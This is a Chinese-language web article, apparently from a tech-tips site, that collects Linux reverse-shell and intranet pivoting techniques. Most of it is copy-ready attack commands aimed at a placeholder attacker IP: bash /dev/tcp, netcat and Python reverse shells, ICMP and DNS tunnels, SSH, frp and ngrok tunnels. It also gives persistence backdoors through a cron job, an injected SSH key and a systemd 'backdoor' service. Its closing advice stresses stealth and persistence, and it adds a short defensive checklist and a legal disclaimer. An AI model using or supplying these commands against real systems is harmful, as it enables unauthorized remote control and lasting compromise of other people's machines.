插件窝 干货文章 Linux下内网反弹技巧总结与杂谈

Linux下内网反弹技巧总结与杂谈

攻击机 端口 反弹 目标 975    来源:    2025-05-21

Linux下内网反弹技巧总结与杂谈

基础反弹方法

1. Bash反弹

# 目标机器执行
bash -i >& /dev/tcp/攻击机IP/端口 0>&1

# 攻击机监听
nc -lvp 端口

2. Netcat反弹

# 目标机器执行
nc -e /bin/sh 攻击机IP 端口

# 或当没有-e参数时
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 攻击机IP 端口 >/tmp/f

# 攻击机监听
nc -lvp 端口

3. Python反弹

# 目标机器执行
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机IP",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

进阶技巧

1. 端口复用

# 使用已开放的SSH端口进行反弹
socat TCP4:攻击机IP:端口,reuseaddr,fork TCP4:127.0.0.1:22

2. ICMP隧道反弹

# 使用ptunnel建立ICMP隧道
ptunnel -p 攻击机IP -lp 本地端口 -da 目标IP -dp 目标端口

3. DNS隧道反弹

# 使用dnscat2
# 攻击机
dnscat2-server --dns domain=example.com

# 目标机器
dnscat2 --dns server=攻击机IP,domain=example.com

内网穿透技巧

1. SSH反向隧道

# 目标机器执行
ssh -fN -R 攻击机端口:localhost:目标端口 攻击机用户@攻击机IP

# 攻击机连接本地端口即可访问目标服务
ssh localhost -p 攻击机端口

2. Frp反向代理

# frps.ini (攻击机)
[common]
bind_port = 7000

# frpc.ini (目标机器)
[common]
server_addr = 攻击机IP
server_port = 7000

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000

3. Ngrok穿透

# 攻击机运行ngrok服务端
./ngrokd -tlsKey=server.key -tlsCrt=server.crt -domain="example.com" -httpAddr=":8080" -httpsAddr=":8081"

# 目标机器运行客户端
./ngrok -config=ngrok.cfg -subdomain=test 80

隐蔽技巧

1. 定时任务反弹

# 写入定时任务
(crontab -l;echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/攻击机IP/端口 0>&1'")|crontab -

2. SSH密钥后门

# 攻击机生成密钥
ssh-keygen -t rsa

# 目标机器写入公钥
echo "公钥内容" >> ~/.ssh/authorized_keys

3. Systemd服务持久化

# /etc/systemd/system/backdoor.service
[Unit]
Description=Backdoor Service

[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/攻击机IP/端口 0>&1'
Restart=always
RestartSec=60

[Install]
WantedBy=multi-user.target

杂谈与注意事项

  1. 权限维持:反弹成功后,应考虑多种权限维持方法,如添加用户、SSH密钥、后门服务等

  2. 流量隐蔽

    • 使用加密隧道
    • 流量伪装成正常协议
    • 低频率连接
  3. 环境适应

    • 受限环境下优先使用系统自带工具
    • 注意防火墙规则和网络拓扑
    • 考虑出口流量限制
  4. 防御措施

    • 监控异常网络连接
    • 限制出站流量
    • 定期检查系统服务和定时任务
    • 使用HIDS进行行为监控
  5. 法律风险:所有技术应仅用于合法授权的渗透测试和安全研究,未经授权使用可能涉及法律问题

内网渗透是一个复杂的过程,需要根据实际情况灵活调整策略,同时要注重隐蔽性和持久性。